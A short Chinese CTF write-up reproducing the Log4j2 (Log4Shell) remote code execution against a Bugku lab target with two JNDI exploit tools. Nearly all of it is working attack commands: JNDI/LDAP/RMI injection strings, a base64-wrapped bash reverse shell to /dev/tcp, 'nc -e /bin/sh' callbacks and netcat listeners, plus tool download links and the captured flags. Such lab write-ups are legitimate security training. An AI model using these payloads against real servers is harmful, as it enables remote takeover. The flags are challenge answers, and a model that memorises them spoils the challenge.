Log4j2_RCE漏洞复现
这里是用了两种工具来复现漏洞
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法
工具地址:https://www.lanzoup.com/imeONxo55if
密码:Le1a
访问靶机地址
先把 工具上传到VPS上,然后运行
1 | java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(bash -i >& /dev/tcp/IP/12345 0>&1)的base64编码}|{base64,-d}|{bash,-i}" -A "IP" |
然后新开一个终端用于监听端口nc -lnvp 12345
然后POST发送payload="${jndi:rmi://IP:1099/z1il2b}"
这个payload在上面运行工具的时候,工具返回过exp地址
收到反弹的shell
用find命令找一下flag
1 | find / -name "fla*" |
得到flag:
1 | flag-{bmh86002b42-ca61-4daf-96b5-658d2c29ef09} |
JNDIExploit-1.2-SNAPSHOT.jar方法:
靶机地址:https://ctf.bugku.com/challenges/detail/id/340.html
工具地址:https://www.lanzoup.com/i8Aa4xo5gmf
密码:Le1a
先把 工具上传到VPS上,然后运行java -jar JNDIExploit-1.2-SNAPSHOT.jar -i IP -p 8080
然后另开 一个终端用来监听端口 nc -lnvp 12345
然后在用户名处填写${jndi:ldap://IP/Basic/Command/Base64/(nc IP 12345 -e /bin/sh)的base64编码}
密码随便填
收到反弹的shell,直接cat /flag
得到flag:
1 | flag{7a44f8fd04f1ba84e7a8afcf6f4c4706} |